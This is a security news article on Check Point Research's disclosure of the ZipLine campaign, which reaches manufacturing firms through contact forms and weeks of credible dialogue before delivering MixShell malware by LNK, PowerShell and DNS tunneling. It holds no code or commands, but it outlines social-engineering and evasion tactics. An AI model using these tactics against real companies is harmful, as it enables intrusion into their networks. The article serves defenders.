Cybersecurity researchers have disclosed a sophisticated social engineering operation targeting supply-chain–critical manufacturing firms with an in-memory malware family named MixShell. The activity, codenamed ZipLine by Check Point Research, eschews traditional phishing emails in favor of initiating contact through a company’s public “Contact Us” form and sustaining weeks of professional, credible exchanges before delivering a weaponized ZIP file containing the MixShell payload.
According to Check Point Research, the operation unfolds over several weeks of dialogue, often including fake non-disclosure agreements, before the attacker delivers the malicious ZIP with a Windows shortcut (LNK) that triggers a PowerShell loader. The loader then deploys MixShell, which uses DNS tunneling with HTTP as a fallback channel to support remote command execution, file operations, reverse proxying, stealth persistence, and deeper network infiltration.
ZipLine appears to be broad in reach but focused on sectors critical to the U.S. and global supply chains. Targeted industries include industrial manufacturing, machinery, metalworking, components production, hardware and semiconductors, consumer goods, biotechnology, and pharmaceuticals. The campaign has also been observed in Singapore, Japan, and Switzerland, suggesting a multinational operation with a shared template infrastructure.
The campaign’s provenance remains under investigation, but Check Point said it identified overlapping digital certificates between an attack IP address and infrastructure previously associated with TransferLoader campaigns, a link it noted to a threat cluster labeled UNK_GreenSec. Check Point emphasized that the attackers leverage legitimate workflows – such as interacting with a company’s contact form – to blend into normal enterprise activity and avoid early detection.
What differentiates ZipLine from earlier drive-by or scare-tactic phishing schemes is its measured, long-running engagement and its use of AI-themed lures to propose assistance with implementing new AI initiatives. The threat actors use a combination of LNK-triggered PowerShell execution, in-memory implants, and DNS tunneling to evade traditional security controls and maintain persistence within target networks.
The malicious ZIPs are hosted on a subdomain of a mainstream Platform-as-a-Service (PaaS) provider, highlighting how attackers abuse legitimate services to camouflage their activity. While not all ZIPs from this hosting domain are harmful, researchers note that delivery is customized in real time based on attacker criteria, underscoring the need for vigilant monitoring of inbound inquiries and conversations initiated via public-facing channels.
“The ZipLine campaign is a wake-up call for every business that believes phishing is just about suspicious links in emails. Attackers are innovating faster than ever-blending human psychology, trusted communication channels, and timely AI-themed lures. To stay safe, organizations must adopt prevention-first, AI-driven defenses and build a culture of vigilance that treats every inbound interaction as a potential threat,” said Sergey Shykevich, threat intelligence group manager at Check Point Research.
For organizations seeking to mitigate risk, experts recommend narrowing exposure on contact channels, enforcing strong verification for unusual requests, and deploying AI-powered threat detection that recognizes anomalous patterns in authentic-looking conversations. As ZipLine demonstrates, attackers are increasingly weaponizing legitimate business workflows to bypass traditional security controls.